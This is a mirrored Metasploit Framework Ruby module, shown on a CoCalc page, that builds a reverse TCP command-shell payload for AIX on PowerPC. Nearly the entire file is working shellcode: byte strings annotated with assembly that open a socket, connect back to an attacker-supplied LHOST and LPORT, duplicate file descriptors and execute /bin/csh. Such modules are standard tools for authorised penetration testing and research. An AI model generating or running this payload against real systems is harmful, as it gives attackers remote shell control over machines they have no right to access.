Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb
21547 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 204

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Aix

11
  include Msf::Sessions::CommandShellOptions

12


13
  def initialize(info = {})

14
    super(

15
      merge_info(

16
        info,

17
        'Name' => 'AIX Command Shell, Reverse TCP Inline',

18
        'Description' => 'Connect back to attacker and spawn a command shell',

19
        'Author' => 'Ramon de C Valle',

20
        'License' => MSF_LICENSE,

21
        'Platform' => 'aix',

22
        'Arch' => ARCH_PPC,

23
        'Handler' => Msf::Handler::ReverseTcp,

24
        'Session' => Msf::Sessions::CommandShellUnix,

25
        'Payload' => {

26
          'Offsets' =>

27
                  {

28
                    'LHOST' => [ 32, 'ADDR' ],

29
                    'LPORT' => [ 30, 'n' ]

30
                  }

31
        }

32
      )

33
    )

34
  end

35


36
  def generate(*args)

37
    super(*args)

38


39
    payload =

40
      "\x7c\xa5\x2a\x79" + #   xor.    r5,r5,r5                   #

41
      "\x40\x82\xff\xfd" + #   bnel    <cntsockcode>              #

42
      "\x7f\xc8\x02\xa6" + #   mflr    r30                        #

43
      "\x3b\xde\x01\xff" + #   cal     r30,511(r30)               #

44
      "\x3b\xde\xfe\x25" + #   cal     r30,-475(r30)              #

45
      "\x7f\xc9\x03\xa6" + #   mtctr   r30                        #

46
      "\x4e\x80\x04\x20" + #   bctr                               #

47
      "\xff\x02\x11\x5c" + #   .long   0xff02115c                 #

48
      "\x7f\x00\x00\x01" + #   .long   0x7f000001                 #

49
      "\x4c\xc6\x33\x42" + #   crorc   6,6,6                      #

50
      "\x44\xff\xff\x02" + #   svca    0                          #

51
      "\x3b\xde\xff\xf8" + #   cal     r30,-8(r30)                #

52
      "\x3b\xa0\x07\xff" + #   lil     r29,2047                   #

53
      "\x38\x9d\xf8\x02" + #   cal     r4,-2046(r29)              #

54
      "\x38\x7d\xf8\x03" + #   cal     r3,-2045(r29)              #

55
      @cal_socket +

56
      "\x7f\xc9\x03\xa6" + #   mtctr   r30                        #

57
      "\x4e\x80\x04\x21" + #   bctrl                              #

58
      "\x7c\x7c\x1b\x78" + #   mr      r28,r3                     #

59
      "\x38\xbd\xf8\x11" + #   cal     r5,-2031(r29)              #

60
      "\x38\x9e\xff\xf8" + #   cal     r4,-8(r30)                 #

61
      @cal_connect +

62
      "\x7f\xc9\x03\xa6" + #   mtctr   r30                        #

63
      "\x4e\x80\x04\x21" + #   bctrl                              #

64
      "\x3b\x7d\xf8\x03" + #   cal     r27,-2045(r29)             #

65
      "\x7f\x63\xdb\x78" + #   mr      r3,r27                     #

66
      @cal_close +

67
      "\x7f\xc9\x03\xa6" + #   mtctr   r30                        #

68
      "\x4e\x80\x04\x21" + #   bctrl                              #

69
      "\x7f\x65\xdb\x78" + #   mr      r5,r27                     #

70
      "\x7c\x84\x22\x78" + #   xor     r4,r4,r4                   #

71
      "\x7f\x83\xe3\x78" + #   mr      r3,r28                     #

72
      @cal_kfcntl +

73
      "\x7f\xc9\x03\xa6" + #   mtctr   r30                        #

74
      "\x4e\x80\x04\x21" + #   bctrl                              #

75
      "\x37\x7b\xff\xff" + #   ai.     r27,r27,-1                 #

76
      "\x40\x80\xff\xd4" + #   bge     <cntsockcode+100>          #

77
      "\x7c\xa5\x2a\x79" + #   xor.    r5,r5,r5                   #

78
      "\x40\x82\xff\xfd" + #   bnel    <cntsockcode+148>          #

79
      "\x7f\x08\x02\xa6" + #   mflr    r24                        #

80
      "\x3b\x18\x01\xff" + #   cal     r24,511(r24)               #

81
      "\x38\x78\xfe\x29" + #   cal     r3,-471(r24)               #

82
      "\x98\xb8\xfe\x31" + #   stb     r5,-463(r24)               #

83
      "\x94\xa1\xff\xfc" + #   stu     r5,-4(r1)                  #

84
      "\x94\x61\xff\xfc" + #   stu     r3,-4(r1)                  #

85
      "\x7c\x24\x0b\x78" + #   mr      r4,r1                      #

86
      @cal_execve +

87
      "\x7f\xc9\x03\xa6" + #   mtctr   r30                        #

88
      "\x4e\x80\x04\x21" + #   bctrl                              #

89
      '/bin/csh'

90


91
    # If the payload is generated and there are offsets to substitute,

92
    # do that now.

93
    if payload && offsets

94
      substitute_vars(payload, offsets)

95
    end

96


97
    payload

98
  end

99
end

100


101